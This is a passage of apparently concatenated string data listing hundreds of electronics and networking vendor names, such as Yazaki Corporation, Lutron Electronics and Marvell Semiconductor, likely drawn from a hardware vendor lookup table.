"Yazaki Corporation", + "Thales e-Transactions GmbH", + "Aurora Multimedia Corp.", + "Micronas GmbH", + "Unatech. Co.,Ltd", + "690885 Ontario Inc.", + "ValuePoint Networks", + "TASI, Inc", + "Niko NV", + "NetModule AG", + "iPulse Systems", + "Webpro Technologies Inc.", + "Mykotronx", + "Appointech, Inc.", + "netplat,Inc.", + "American Time and Signal", + "ARTDIO Company Co., LTD", + "EPIN Technologies, Inc.", + "Franklin Technology Systems", + "XTec, Incorporated", + "Lutron Electronics Co., Inc.", + "MBTech Systems, Inc.", + "Gw Technologies Co.,Ltd.", + "Id Digital Corporation", + "Kyushu Electronics Systems Inc.", + "FMN communications GmbH", + "Ieee 802.11", + "Panduit Corp", + "BeiJing NuQX Technology CO.,LTD", + "D&R Electronica Weesp BV", + "Sandburst", + "First Silicon Solutions", + "ACTi Corporation", + "Dionica R&D Ltd.", + "Chantry Networks", + "Onkey Technologies, Inc.", + "SOLOMON Technology Corp.", + "Sarotech Co., Ltd", + "Avamax Co. Ltd.", + "Avanex Corporation", + "Europlex Technologies", + "Adaptive Instruments", + "Orion MultiSystems Inc", + "Gigawavetech Pte Ltd", + "Stretch, Inc.", + "Fuji System Machines Co., Ltd.", + "Xambala Incorporated", + "Hisharp", + "Raza Microelectronics Inc", + "Megapower International Corp.", + "WorldAccxx LLC", + "Azul Systems, Inc.", + "Mangrove Systems, Inc.", + "Legra Systems, Inc.", + "Digitalks Inc", + "Com&C Co., Ltd", + "Entrelogic Corporation", + "PLX Technology", + "ExtremeSpeed Inc.", + "AimValley B.V.", + "Boston Scientific", + "Epicenter, Inc.", + "RDM Corporation", + "Digital Multitools Inc", + "Motorola Korea", + "Hanmi Semiconductor Co., Ltd.", + "Paragon Fidelity GmbH", + "United Technologists Europe Limited", + "Astarte Technology Co, Ltd.", + "Thomson Technology Inc", + "Scalent Systems, Inc.", + "Mintron Enterprise Co., Ltd.", + "Gawell Technologies Corp.", + "Janitza electronics GmbH", + "Eltis Microelectronics Ltd.", + "TransCore", + "GemWon Communications Co., Ltd.", + "Device Drivers Limited", + "Tiscali UK Ltd", + "activ-net GmbH & Co. KG", + "Iworld Networking, Inc.", + "NCI System Co.,Ltd.", + "Catalyst Enterprises, Inc.", + "Solar Telecom. Tech", + "Snap-on OEM Group", + "Qcom Technology Inc.", + "Samsung Thales", + "Profilo Telra Elektronik Sanayi ve Ticaret. A.Ş", + "Teletronics International Inc.", + "Space Dynamics Lab", + "CompXs Limited", + "Andrew RF Power Amplifier Group", + "Soc. Coop. Bilanciai", + "BDT Büro und Datentechnik GmbH & Co.KG", + "ORGA Kartensysteme GmbH", + "Niigata Seimitsu Co.,Ltd.", + "G-Tek Electronics Sdn. Bhd.", + "Digital 5, Inc.", + "TCL Networks Equipment Co., Ltd.", + "Gincom Technology Corp.", + "SouthWing S.L.", + "Netac Technology Co., Ltd.", + "Kontron Medical", + "Plexus Corp (UK) Ltd", + "Japan Network Service Co., Ltd.", + "Dataprobe, Inc.", + "Ingeteam", + "Parker Hannifin GmbH Electromechanical Division Europe", + "Engineering & Security", + "Dynamic Solutions Co,.Ltd.", + "K-Tech Devices Corp.", + "K-Patents Oy", + "Teletronics Technology Corporation", + "TOKUDEN OHIZUMI SEISAKUSYO Co.,Ltd.", + "Emerging Technologies Limited", + "Dosch & Amand Systems Ag", + "Infotec Ltd", + "Spagat AS", + "DigiRose Technology Co., Ltd.", + "SafeWeb Inc", + "Tapwave, Inc.", + "Phsnet", + "Sanmina-SCI Hungary Ltd.", + "MIDAS COMMUNICATION TECHNOLOGIES PTE LTD ( Foreign Branch)", + "Kobian Pte Ltd - Taiwan Branch", + "Redwood Technologies LTD", + "Raritan Computer, Inc", + "DENT Instruments, Inc.", + "Vtera Technology Inc.", + "T&D Corporation", + "Factum Electronics AB", + "Océ Document Technologies GmbH", + "Globalsat Technology Corporation", + "Stormshield", + "Design Combus Ltd", + "Ilwoo Data & Technology Co.,Ltd", + "Calrec Audio Ltd", + "AIN Comm.Tech.Co., LTD", + "WISCORE Inc.", + "Smart Solution, Inc", + "MICROPLEX Printware AG", + "Kyoto Electronics Manufacturing Co., Ltd.", + "High-Tek Harness Ent. Co., Ltd.", + "Yuehua(Zhuhai) Electronic CO. LTD", + "jp-embedded", + "Bloomberg L.p.", + "aphona Kommunikationssysteme", + "Verint Loronix Video Solutions", + "Wiplug", + "Prediwave Corp.", + "FreeHand Systems, Inc.", + "AOS technologies AG", + "Iec - Tc57", + "Korea Network Systems", + "InfoExpress", + "Eazix, Inc.", + "DaTARIUS Technologies GmbH", + "Extel Communications P/L", + "Edwards Ltd.", + "ACC GmbH", + "Mbari", + "Kurz Industrie-Elektronik GmbH", + "UbeeAirWalk, Inc.", + "NKE Corporation", + "Hitech Electronics Corp.", + "Riverhead Networks Inc.", + "Chic Technology (China) Corp.", + "UDTech Japan Corporation", + "ABB AB, Cewe-Control", + "Arcor AG&Co.", + "SK Teletech(R&D Planning Team)", + "Tri Term Co.,Ltd.", + "ROUND Co.,Ltd.", + "Naman NZ LTd", + "Ebtron Inc.", + "Oriental integrated electronics. LTD", + "Fi WIn, Inc.", + "CyberPower Systems, Inc.", + "Paxton Access Ltd", + "XiMeta Technology Americas Inc.", + "Beijing Wise Technology & Science Development Co.Ltd", + "Comflux Technology Inc.", + "EyeCross Co.,Inc.", + "Concorde Microsystems Inc.", + "Hitachi IE Systems Co., Ltd", + "Nippon Electric Instrument, Inc.", + "Cogent Defence & Security Networks,", + "Glimmerglass Networks", + "Berkeley Camera Engineering", + "Kodeos Communications", + "ET&T Technology Co. Ltd.", + "Audio Engineering Society Inc.", + "Sy.A.C. srl", + "Friedrich Lütze GmbH & Co. KG", + "SensAble Technologies, Inc.", + "TriBeam Technologies, Inc.", + "Top Global Technology, Ltd.", + "Kerajet, S.a.", + "ScriptPro, LLC", + "Newtech Co.,Ltd", + "Rincon Research Corporation", + "Telex Communications", + "Datawatt B.v.", + "Litchfield Communications Inc.", + "Kingwave Technology Co., Ltd.", + "SAGINOMIYA Seisakusho Inc.", + "Lycium Networks", + "Maranti Networks", + "Aiphone co.,Ltd", + "Shiron Satellite Communications Ltd. (1996)", + "Bay Microsystems, Inc.", + "ISAC, Inc.", + "Ing. Büro Dr. Beutlhauser", + "Pacific Broadband Networks", + "Fujian Start Computer Equipment Co.,Ltd", + "Taekwang Industrial Co., Ltd", + "Daiichi Electronics Co., Ltd.", + "Adam Elektronik Ltd. Şti", + "Yang Mei Technology Co., Ltd", + "Fujitsu Softek", + "Hirata corporation", + "Environmental Systems and Services", + "Systronix, Inc.", + "BittWare, Inc", + "LS(LG) Industrial Systems co.,Ltd", + "Taiwan Secom Co,. Ltd", + "Stargames Corporation", + "Keisoku Giken Co.,Ltd.", + "Vivato Technologies", + "Himeji Abc Trading Co.,Ltd.", + "EKS Elektronikservice GmbH", + "Manticom Networks Inc.", + "ZyFLEX Technologies Inc", + "Shanghai Surveillance Technology Co,Ltd", + "BroadWeb Corportation", + "Bayside Interactive, Inc.", + "King Young Technology Co. Ltd.", + "Astera Technologies Corp.", + "V V S Limited", + "Integra Telecom Co. Ltd", + "Red-M Products Limited", + "DataPower Technology, Inc.", + "Chunghwa Telecom Co., Ltd.", + "Audio-Technica Corp.", + "Maple Networks Co., Ltd", + "Cabot Communications Limited", + "GCT Semiconductor, Inc", + "InCypher S.A.", + "Tecton Ltd", + "DHD GmbH", + "OngCorp", + "Control Module Inc.", + "DC Security Products", + "Fält Communications AB", + "eSpace", + "Signal Communication, Inc.", + "Philips Patient Monitoring", + "Art Japan Co., Ltd.", + "Ubinetics Limited", + "MCM Systems Ltd", + "Leadfly Techologies Corp. Ltd.", + "Hansung Eletronic Industries Development Co., Ltd", + "Western DataCom Co., Inc.", + "TECO a.s.", + "Sealevel Systems, Inc.", + "FAST media integrations AG", + "Cyber Switching Inc.", + "Sinbon Electronics Co., Ltd.", + "Elmo Company, Limited", + "Naval Research Laboratory", + "Mamiya-OP Co.,Ltd.", + "InterEpoch Technology,INC.", + "Castle Technology Ltd", + "Capinfo Company Limited", + "Cetacean Networks", + "Metalink LTD.", + "Nishi Nippon Electric Wire & Cable Co.,Ltd.", + "VividLogic Inc.", + "Option Wireless Sweden", + "Auto Telecom Company", + "Velocity Semiconductor", + "Newport Networks", + "Hitpoint Inc.", + "iQstor Networks, Inc.", + "Yoda Communications, Inc.", + "Toyokeiki Co.,Ltd.", + "Heaman System Co., Ltd", + "Proteam Computer Corporation", + "Young Generation International Corp.", + "Homenet Communications", + "FillFactory NV", + "Braintree Communications Pty Ltd", + "Independent Storage Corporation", + "AMiT spol. s. r. o.", + "Auerswald GmbH & Co. KG", + "Sonitor Technologies AS", + "Dialogue Technology Corp.", + "Philips Medical Systems - Cardiac and Monitoring Systems (CM", + "Intelnet S.a.", + "Telenor Connect A/S", + "SnedFar Technology Co., Ltd.", + "MyCasa Network Inc.", + "WEM Technology Inc", + "DapTechnology B.V.", + "Wipotec GmbH", + "NORTHDATA Co., Ltd.", + "Bon Electro-Telecom Inc.", + "BroadTel Canada Communications inc.", + "Syspol", + "Fastwel", + "Shenzhen Compass Technology Development Co.,Ltd", + "ProQuent Systems", + "Novatec Corporation", + "Multiware & Image Co., Ltd.", + "ROMWin Co.,Ltd.", + "Excel Master Ltd.", + "Wiznet", + "Telena Communications, Inc.", + "Barix AG", + "SofaWare Technologies Ltd.", + "IneoQuest Technologies, Inc", + "HASSNET Inc.", + "IPMobileNet Inc.", + "Nihon Computer Co., Ltd.", + "Digital Hands Co.,Ltd.", + "Sigma Corporation", + "Panasas, Inc", + "Chrysalis Development", + "Esteem Networks", + "SonoSite, Inc.", + "Logic Product Development", + "Asa Systems", + "Beijing Enter-Net co.LTD", + "Cradle Technologies", + "3e Technologies Int;., Inc.", + "Kirana Networks, Inc.", + "Missouri FreeNet", + "Securiton Gmbh", + "Entrisphere Inc.", + "DSX Access Systems, Inc.", + "Picanol N.V.", + "Schlumberger", + "Spectrum Signal Processing Inc.", + "Ginganet Corporation", + "Chr. Mayr GmbH & Co. KG", + "VDA Group S.p.a.", + "ICA Inc.", + "Gluon Networks", + "Galtronics", + "Tokyo Electron Device Nagasaki Limited", + "Windigo Systems", + "Any One Wireless Ltd.", + "Lockheed Martin Tactical Systems", + "Eletex Co., Ltd.", + "Davolink Co. Inc.", + "Polaris Networks, Inc.", + "Data Video Technologies Co., Ltd.", + "Young Technology Co., Ltd.", + "J Communications Co., Ltd.", + "Embedded System Corporation", + "YoungWoo Telecom Co. Ltd.", + "Chou Chin Industrial Co., Ltd.", + "29530", + "Lafon", + "Boris Manufacturing Corp.", + "m-u-t AG", + "Allradio Co., Ltd", + "Idea System Co., Ltd.", + "Valence Semiconductor, Inc.", + "Shin Satellite Public Company Limited", + "LSI Systems, Inc.", + "Wegener Communications, Inc.", + "SynCom Network, Inc.", + "Ormazabal", + "Daihen Corporation", + "Carl Valentin GmbH", + "Mobiis Co., Ltd.", + "Novabase SGPS, SA", + "Opteon Corporation", + "Kistler Instrumente AG", + "Innovance Networks", + "Shenyang Neu-era Information & Technology Stock Co., Ltd", + "Optical Network Testing, Inc.", + "Ceemax Technology Co., Ltd.", + "Techno Trade s.a", + "Adax, Inc.", + "Hitachi Printing Solutions, Ltd.", + "Fnet Co., Ltd.", + "PINON Corp.", + "Petards Ltd", + "KC Technology, Inc.", + "Mx Imaging", + "Westwave Communications", + "Baumer Optronic GmbH", + "Piolink Inc.", + "Prime Electronics & Satellitics Inc.", + "Euracom Communication GmbH", + "ITRAN Communications Ltd.", + "Elgar Electronics Corp.", + "JMI Electronics Co., Ltd.", + "Accella Technologies Co., Ltd.", + "WinCom Systems, Inc.", + "Sick Ag", + "Aristos Logic Corp.", + "The Linksys Group, Inc.", + "Uniwide Technologies, Inc.", + "Gentner Communications Corp.", + "Bivio Networks", + "Hinox, Co., Ltd.", + "Hoshino Metal Industries, Ltd.", + "Geospace Technologies", + "PacketLight Networks Ltd.", + "Red Lion Controls Inc.", + "Power R, Inc.", + "Webyn", + "Otanikeiki Co., Ltd.", + "NADEX Co., Ltd.", + "Broad Net Technology Inc.", + "TouchStar Technologies, L.L.C.", + "Intrinsyc Software International Inc.", + "Adtranz Sweden", + "Toptrend-Meta Information (ShenZhen) Inc.", + "Electronic Innovation, Inc.", + "Empirix Corp.", + "Gi Fone Korea, Inc.", + "Telect, Inc.", + "Inncom International, Inc.", + "IPOptical, Inc.", + "Renishaw PLC", + "MGE UPS Systems France", + "Kimoto Electric Co., Ltd.", + "Blue2space", + "Konami Corporation", + "Robinson Corporation", + "Roving Networks", + "ShenZhen XunBao Network Technology Co Ltd", + "Alexon Co., Ltd.", + "J-Works, Inc.", + "Agile TV Corporation", + "Rangestar Wireless", + "DVC Company, Inc.", + "Eaton Automation AG", + "Etymonic Design, Inc.", + "Tailyn Communication Company Ltd.", + "Secui.com Corporation", + "Hung Chang Co., Ltd.", + "nac Image Technology, Inc.", + "FutureSmart Networks, Inc.", + "Prolink Microsystems Corporation", + "RCO Security AB", + "ImageCom Limited", + "Innomedia Technologies Pvt. Ltd.", + "Zinwell Corporation", + "Flextronics International GmbH & Co. Nfg. KG", + "Daniel Computing Systems, Inc.", + "Lucid Voice Ltd.", + "Asahi-Engineering Co., Ltd.", + "Kott", + "QEI, Inc.", + "Otari, Inc.", + "Amphus", + "Infinite Electronics Inc.", + "WhereNet", + "Taijin Media Co., Ltd.", + "AVL List GmbH", + "Nets Technology Co., Ltd.", + "Complementary Technologies Ltd", + "Reddo Networks AB", + "ICS Spa", + "Memobox SA", + "Daeryung Ind., Inc.", + "Network Photonics, Inc.", + "Danam Communications, Inc.", + "IPAS GmbH", + "International Communications Products, Inc.", + "Pixord Corporation", + "Autosys", + "Ocular Networks", + "TMC s.r.l.", + "Corega of America", + "Ines Test and Measurement GmbH & CoKG", + "Shikoku Instrumentation Co., Ltd.", + "Wuhan Research Institute of MII", + "Mobiwave Pte Ltd", + "Medrad, Inc.", + "YottaYotta, Inc.", + "DMD Computers SRL", + "Mapletree Networks", + "Tdsoft Communication, Ltd.", + "Peek Traffic B.V.", + "LIBA Maschinenfabrik GmbH", + "VersaLogic Corp.", + "CASTOR Informatique", + "Signal Technology, Inc.", + "Deltron Technology, Inc.", + "Medialogic Corp.", + "Rasteme Systems Co., Ltd.", + "Half Dome Systems, Inc.", + "Equitrac Corporation", + "hopf Elektronik GmbH", + "Solphone K.K.", + "ICUE Systems, Inc.", + "Signal Communications Limited", + "Netility", + "Nexsi Corporation", + "Fa. Metabox AG", + "SanCastle Technologies, Inc.", + "TiMetra Networks", + "ENEGATE Co.,Ltd.", + "Allegro Networks, Inc.", + "FireBrick Limited", + "Wisi", + "Tera System Co., Ltd.", + "Hyundai Teletek Co., Ltd.", + "California Amplifier", + "Hermstedt SG", + "Wavesight Limited", + "Desana Systems", + "Takamisawa Cybernetics Co., Ltd.", + "Secheron SA", + "Dazzle Multimedia, Inc.", + "ICG Research, Inc.", + "Akara Canada, Inc.", + "Macrotek International Corp.", + "Traxit Technology, Inc.", + "Imation Corp.", + "Bridge Information Systems", + "MTS Systems Corp.", + "SystemGear Co., Ltd.", + "Coax Media", + "AME Optimedia Technology Co., Ltd.", + "Atoga Systems, Inc.", + "Uniwill Computer Corp.", + "Texcel Technology PLC", + "JAMA Electronics Co., Ltd.", + "MSC Vertriebs GmbH", + "Viditec, Inc.", + "ReadyNet", + "Handan BroadInfoCom", + "Reco Research Co., Ltd.", + "Nobell Communications, Inc.", + "Digital China (Shanghai) Networks Ltd.", + "Scope Information Management, Ltd.", + "F3, Inc.", + "Beijing Broad Telecom Ltd., China", + "BridgeWave Communications", + "Intervoice-Brite, Inc.", + "Routrek Networks Corporation", + "CS Systemes De Securite - C3S", + "Timeware Ltd.", + "ETAS GmbH", + "BigBand Networks, Ltd.", + "Embedone Co., Ltd.", + "VIVE Synergies, Inc.", + "Watanabe Electric Industry Co., Ltd.", + "TeleCruz Technology, Inc.", + "Air Link Technology", + "CTC Union Technologies Co., Ltd.", + "AddPac Technology Co., Ltd.", + "Hitachi Energy Switzerland Ltd", + "Flatstack Ltd.", + "Technocom Communications Technology (pte) Ltd", + "Whi Konsult Ab", + "Continuous Computing Corp", + "LVL 7 Systems, Inc.", + "RACOM, s.r.o.", + "Cablevision", + "Cambridge Silicon Radio", + "Alpha Processor, Inc.", + "Tsann Kuen China (Shanghai)Enterprise Co., Ltd. IT Group", + "Soma Networks, Inc.", + "Cocess Telecom Co., Ltd.", + "Philips CFT", + "Soyo Group Soyo Com Tech Co., Ltd", + "Virditech Co. Ltd.", + "Horoscas", + "ViaClix, Inc.", + "Riverstone Networks", + "Tokyo Sokushin Co., Ltd.", + "Lectron Co,. Ltd.", + "Rapid 5 Networks, Inc.", + "Control Applications, Ltd.", + "IPM Datacom S.R.L.", + "Acr", + "FoxJet, Inc.", + "Arelnet Ltd.", + "Creative Technology, Ltd.", + "ABB Bomem, Inc.", + "Data Direct Networks, Inc.", + "Digital Voice Systems, Inc.", + "Comtrol Europe, Ltd.", + "Tridium, Inc.", + "Innovative Concepts, Inc.", + "Ando Electric Corporation", + "P-Cube, Ltd.", + "ESD Electronic System Design GmbH", + "Data General Communication Ltd.", + "Paralon Technologies", + "WINCOMM Corporation", + "inXtron, Inc.", + "Quarry Technologies", + "Fenecom", + "Native Networks, Inc.", + "Advanced Scientific Corp", + "Woonsang Telecom, Inc.", + "Erim S.a.", + "Custom Micro Products, Ltd.", + "Frequentis", + "Brains Corporation", + "CompuLab, Ltd.", + "Infinilink Corporation", + "AG-E GmbH", + "PAXCOMM, Inc.", + "HeiSei Electronics", + "Gotham Networks", + "Shark Multimedia Inc.", + "Netspect Technologies, Inc.", + "AVLAB Technology, Inc.", + "Hitex Holding GmbH", + "Brix Networks", + "Edsl", + "Shin Kin Enterprises Co., Ltd", + "CyberOptics Corporation", + "Best Technology Co., Ltd.", + "Meta Machine Technology", + "Promise Technology, Inc.", + "Mag-Tek, Inc.", + "Uwe Disch", + "Scientific-Atlanta Arcodan A/S", + "TechnoLand Co., LTD.", + "PC Partner Ltd.", + "Ascom Tateco AB", + "Dranetz - BMI", + "Bna Systems", + "E-Control Systems, Inc.", + "NetLinks Co., Ltd.", + "AudeSi Technologies", + "Olympus Corporation", + "Selectron Systems AG", + "Precidia Technologies, Inc.", + "Conklin Corporation", + "MagicRam, Inc.", + "TeraForce Technology Corporation", + "Impacct Technology Corp.", + "Flueckiger Elektronik Ag", + "Telgen Corporation", + "Smartware", + "Village Networks, Inc. (VNI)", + "Amper Datos S.A.", + "Nicotra Sistemi S.p.a", + "Intraserver Technology", + "Equip'trans", + "Point Grey Research Inc.", + "Jones Futurex Inc.", + "Alaris, Inc.", + "Intellibyte Inc.", + "Superpower Computer", + "Xcp, Inc.", + "Cqos, Inc.", + "Uniform Industrial Corp.", + "LuxN, N", + "Congruency, Ltd.", + "Appian Communications, Inc.", + "Ensim Corp.", + "FASE Saldatura srl", + "Datacore Software Corp.", + "HeiTel Digital Video GmbH", + "Nissei Electric Co., Ltd.", + "Onprem Networks", + "AAE Systems, Inc.", + "Visionetics International", + "BlueArc UK Ltd", + "Ramix Inc.", + "B2c2, Inc.", + "Acn Advanced Communications", + "Ultrak, Inc.", + "Solidum Systems Corp.", + "Syntech Information Co., Ltd.", + "Technology Atlanta Corp.", + "Bryant Technology, Ltd.", + "Kvaser Ab", + "Pentacom Ltd.", + "Zhs Zeitmanagementsysteme", + "Altos C&C", + "Divio, Inc.", + "Altvater Airdata Systems", + "Pingtel Corp.", + "Toko Electric", + "Root, Inc.", + "Infortrend Technology, Inc.", + "Convergent Networks, Inc.", + "La Cie Group S.a.", + "Pluris, Inc.", + "Gateworks Corp.", + "Div Of Research & Statistics", + "Communication Automation Corp.", + "Computational Systems, Inc.", + "Dolby Laboratories, Inc.", + "Philips Multimedia Network", + "Snijder Micro Systems", + "Taicom Data Systems Co., Ltd.", + "Vieo, Inc.", + "Filanet Corporation", + "Oresis Communications, Inc.", + "Monterey Networks", + "Network Engines, Inc.", + "Katsujima Co., Ltd.", + "Foveon, Inc.", + "Mac System Co., Ltd.", + "Sr Telecom Inc.", + "Modular Mining Systems, Inc.", + "Hirschmann Austria Gmbh", + "Convision Technology Gmbh", + "Ele-Chem Engineering Co., Ltd.", + "Teratech Corporation", + "Tremon Enterprises Co., Ltd.", + "Deltakabel Telecom Cv", + "Furuno Electric Co., Ltd.", + "Tokyo Sokki Kenkyujo Co., Ltd.", + "Joohong Information &", + "Optronics", + "Contemporary Control", + "Videocon Ag", + "Moldat Wireless Technolgies", + "Switchcore Ab", + "Newer Technology", + "Lg International Corp.", + "Venture Manufacturing (Singapore) Ltd.", + "Spring Tide Networks, Inc.", + "Abl Canada, Inc.", + "Tas Telefonbau A. Schwabe Gmbh & Co. Kg", + "Tiva Microcomputer Corp. (Tmc)", + "Mrg Systems, Ltd.", + "Visioncomm Co., Ltd.", + "Netcam, Ltd.", + "Gilbarco, Inc.", + "Sharewave, Inc.", + "Dictaphone Corporation", + "Galil Motion Control", + "Ormec Systems Corp.", + "Photron Usa", + "Marvell Semiconductor, Inc.", + "Oxtel, Ltd.", + "Doms A/S", + "Corvis Corporation", + "Integrix, Inc.", + "Internet Magic, Inc.", + "Etrend Electronics, Inc.", + "Zeal Corporation", + "Domex Technology Corp.", + "Data Electronics (Aust.) Pty, Ltd.", + "Molex Canada Ltd", + "Tiara Networks, Inc.", + "Cae Electronics", + "Biopac Systems, Inc.", + "AANetcom, Inc.", + "Turbo Communication, Inc.", + "NetBoost Corp.", + "Genicom Corporation", + "Network Alchemy, Inc.", + "Mariner Networks", + "Peracom Networks", + "Beran Instruments Ltd.", + "Spectra Logic", + "Corecess Inc.", + "Adtec Productions, Inc.", + "Fountain Technologies, Inc.", + "Vadem", + "Kawasaki Lsi U.s.a., Inc.", + "BindView Development Corp.", + "Javelin Systems, Inc.", + "Inova Computers Gmbh & Co. Kg", + "Fibex Systems", + "Coherent Communications Systems Corporation", + "ICP VORTEX COMPUTERSYSTEME GmbH", + "Topic Semiconductor Corp.", + "Dearborn Group, Inc.", + "Pyrescom", + "Zida Technologies Limited", + "Computer Technology Corp.", + "Sundance Technology, Inc.", + "Clarinet Systems, Inc.", + "Micro Linear Coporation", + "Universal Avionics", + "Applied Digital Access", + "Pipelinks, Inc.", + "Nihon Media Tool Inc.", + "Avici Systems Inc.", + "Force Institute", + "Diamond Multimedia", + "Innovative Semiconductors, Inc", + "Praxon, Inc.", + "Escalate Networks, Inc.", + "NineTiles Networks, Ltd.", + "Centigram Communications Corp.", + "Crypto Ag", + "Lanner Electronics, Inc.", + "Pacific Research & Engineering Corporation", + "WAVTrace, Inc.", + "Finisar Corporation", + "Grips Electronic Gmbh", + "K.j. Law Engineers, Inc.", + "avateramedical Mechatronics GmbH", + "Mitsubishi Chemical America, Inc.", + "Communications Electronics Security Group", + "ATTO Technology, Inc.", + "Nexcom International Co., Ltd.", + "Rise Computer Inc.", + "Gvn Technologies, Inc.", + "Kollmorgen Corp", + "Nsi Corporation", + "American Networks Inc.", + "BACHMANN ELECTRONIC GmbH", + "Innovex Technologies, Inc.", + "T.sqware", + "Cimetrics, Inc.", + "Amherst Systems, Inc.", + "Phasecom, Ltd.", + "Adept Technology", + "SatCom Media Corporation", + "Tracewell Systems, Inc.", + "Jna Telecommunications Limited", + "Starnet Technologies, Inc.", + "Comos Telecom", + "Tollgrade Communications, Inc.", + "Interface Concept", + "Sodick Co., Ltd.", + "Hostlink Corp.", + "InnoMedia, Inc.", + "Alacritech, Inc.", + "S.i. Tech, Inc.", + "Data & Information Technology", + "Hand Held Products Inc", + "Diamond Network Tech", + "The Brantley Coile Company,Inc", + "Dbtel Incorporated", + "EUREM GmbH", + "Shinko Electric Industries Co.", + "EDNT GmbH", + "Raidtec Ltd.", + "Imatron, Inc.", + "Advanet Inc.", + "Zf Microsystems, Inc.", + "Solectron Texas", + "IRIICHI TECHNOLOGIES Inc.", + "Koito Electric Industries, Ltd.", + "Initio Corporation", + "Antec", + "Avaya ECS Ltd", + "March Networks Corporation", + "Fujitsu Services Ltd", + "ArrowPoint Communications", + "Industrial Cpu Systems", + "Aastra Telecom", + "ShoreTel, Inc", + "Spirent plc, Service Assurance Broadband", + "Torrent Networking Technologies Corp.", + "Sk-Elektronik Gmbh", + "Link2it, L.l.c.", + "Cinco Networks, Inc.", + "EdgePoint Networks, Inc.", + "Gateway 2000", + "Mettler-Toledo, Inc.", + "Redlake MASD LLC", + "Tecnomen Oy", + "Radiant Systems", + "Nexware Corp.", + "Century Corporation", + "Cellport Labs, Inc.", + "DATENTECHNIK GmbH", + "VitalCom", + "EtherWAN Systems, Inc.", + "Silicom, Ltd.", + "Leightronix, Inc.", + "NECSY S.p.A.", + "Engage Networks, Inc.", + "Touchwave, Inc.", + "DeskStation Technology, Inc.", + "Han Microtelecom. Co., Ltd.", + "Symon Communications, Inc.", + "Walt Disney Imagineering", + "Berkeley Networks", + "LeCroy - Networking Productions Division", + "Cspi", + "Innova Corp.", + "Anerma", + "Webgear, Inc.", + "Holontech Corporation", + "Mcns Holdings, L.p.", + "ZX Technologies, Inc", + "Hagiwara Electric Co., Ltd.", + "Rooftop Communications Corp.", + "Telmax Communications Corp.", + "Mikrodidakt Ab", + "Samson Ag", + "Vicom Systems, Inc.", + "Apollo", + "Elmic Systems, Inc.", + "Flytech Technology Co., Ltd.", + "Storage Concepts", + "Toyoda Machine Works, Ltd.", + "Network Tools, Inc.", + "I-Cube, Inc.", + "Acuity Imaging, Inc.", + "Netstal Maschinen Ag", + "Internix Inc.", + "Axiom Technology Co., Ltd.", + "T.s. Microtech Inc.", + "Fore Systems, Inc.", + "Crystal Semiconductor Corp.", + "Educational Technology Resources, Inc.", + "Red Lion Controls, LP", + "Trio Information Systems Ab", + "iDirect, INC.", + "Quick Controls Ltd.", + "Macrovision Corporation", + "Telxon Corporation", + "ControlNet, Inc.", + "Nippon Unisoft Corporation", + "First Pacific Networks, Inc.", + "Puritan Bennett", + "Eg&G Nuclear Instruments", + "Cristie Electronics Ltd.", + "Jrl Systems, Inc.", + "Pathlight Technologies", + "CS COMPUTER SYSTEME GmbH", + "imc MeBsysteme GmbH", + "Navtel Communications Inc.", + "Video Lottery Technologies,Inc", + "Ethercom Corp.", + "O.n. Electronic Co., Ltd.", + "Computex Co., Ltd.", + "Keisokugiken Corporation", + "Johnson & Johnson Medical, Inc", + "Icon West, Inc.", + "Telesync, Inc.", + "Compuserve, Inc.", + "Webtronics", + "Macraigor Systems, Inc.", + "Xycom Inc.", + "Particle Measuring Systems", + "Symicron Computer Communications, Ltd.", + "Mannesmann Tally Corporation", + "AutoGas Systems Inc.", + "Tekram Technology Co., Ltd.", + "Soliton Systems K.k.", + "Microtronix Datacom Ltd.", + "Mindray DS USA, Inc.", + "Innovative Systems & Technologies, Inc.", + "Hazeltine Corporation, Ms 1-17", + "Inficon", + "Binar Elektronik Ab", + "Essential Communications", + "R.a. Systems Co., Ltd.", + "Tfl Lan Inc.", + "Kvb/Analect", + "Atm Forum", + "Shindengen Electric Mfg. Co., Ltd.", + "Tricord Systems, Inc.", + "Toray Engineering D Solutions Co., Ltd.", + "Avid Technology, Inc.", + "Color Sentinel Systems, LLC", + "Tadiran Telecommunications", + "interWAVE Communications", + "V.i Computer Corp.", + "TimeStep Corporation", + "Vorax Corporation", + "Aston Electronic Designs Ltd.", + "First Virtual Corporation", + "Jeol System Technology Co. Ltd", + "Mercury Computer Systems, Inc.", + "J125, National Security Agency", + "Niobrara R & D Corporation", + "Pairgain Technologies, Inc.", + "Worklink Innovations", + "Pretec Electronics Corp.", + "Cincinnati Microwave, Inc.", + "Oa Laboratory Co., Ltd.", + "Taiyo Corporation", + "Fisher & Paykel Production", + "Jc Information Systems", + "Com21, Inc.", + "Kubotek Corporation", + "Shima Seiki", + "Firepower Systems, Inc.", + "Alcatel Data Networks", + "Radiolan, Inc.", + "Metricom, Inc.", + "Scinets", + "Scitex Corp. Ltd.", + "H. Bollmann Manufacturers, Ltd", + "Techware Systems Corp.", + "Xact, Inc.", + "Altos India Limited", + "Data Net", + "Reudo Corporation", + "Datatrek Corporation", + "Eagle Technology", + "Information Resource Engineering", + "Sfa, Inc.", + "InterNet Systems of Florida, Inc.", + "Altech Co., Ltd.", + "Source-Comm Corp.", + "Test & Measurement Systems Inc", + "Api Engineering", + "Protec Microsystems, Inc.", + "Synapse Technologies, Inc.", + "Efficient Networks, Inc.", + "Osaka Computer Corp.", + "Terma Elektronik As", + "Hsing Tech Enterprise Co., Ltd", + "Galcom Networking Ltd.", + "Versalynx Corporation", + "Evergreen Technology Corp.", + "Castle Rock, Inc.", + "Camtronics Medical Systems", + "Motorola Communication Israel", + "Zax Corporation", + "Sast Technology Corp.", + "ION Networks, Inc.", + "Sonix Communications, Ltd.", + "Algorithms Software Pvt. Ltd.", + "Comtron, Inc.", + "Korea Computer Inc.", + "Oce Printing Systems, Gmbh", + "Packard Bell Elec., Inc.", + "Ming Fortune Industry Co., Ltd", + "Welltronix Co., Ltd.", + "Xnet Technology, Inc.", + "Perq Systems Corporation", + "Teridian Semiconductor Corporation", + "Barron Mccann Ltd.", + "Leap Technology, Inc.", + "Imatran Voima Oy", + "Risc Developments Ltd.", + "Corporate Network Systems,Inc.", + "Creative Microsystems", + "Funk Software, Inc.", + "New Media Corporation", + "Trace Mountain Products, Inc.", + "Vmx Inc.", + "Xante Corporation", + "Networks Northwest, Inc.", + "Seco Srl", + "American Power Conversion Corp", + "Elastic Reality, Inc.", + "Forval Creative, Inc.", + "Rad Data Communications, Ltd.", + "Seritech Enterprise Co., Ltd.", + "Autocomputer Co., Ltd.", + "Galaxy Networks, Inc.", + "Proxim 